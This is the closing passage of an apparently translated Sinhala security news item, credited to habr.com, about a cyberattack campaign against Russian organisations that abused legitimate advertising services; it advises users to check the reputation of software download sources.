මෙම ව්යාපාරය සයිබර් ප්රහාරවලදී නීත්යානුකූල වෙළඳ ප්රචාරණ සේවා භාවිතය පිළිබඳ උදාහරණයකි. මෙම යෝජනා ක්රමය රුසියානු සංවිධාන ඉලක්ක කර ඇති නමුත් රුසියානු නොවන සේවාවන් භාවිතා කරමින් එවැනි ප්රහාරයක් දැකීම අප පුදුමයට පත් නොවනු ඇත. සම්මුතිය වළක්වා ගැනීම සඳහා, පරිශීලකයන් තමන් බාගත කරන මෘදුකාංගයේ මූලාශ්රයේ කීර්තිය ගැන විශ්වාස කළ යුතුය.
සම්මුති සහ MITER ATT&CK ගුණාංග පිළිබඳ සම්පූර්ණ දර්ශක ලැයිස්තුවක් ලබා ගත හැකිය
මූලාශ්රය: www.habr.com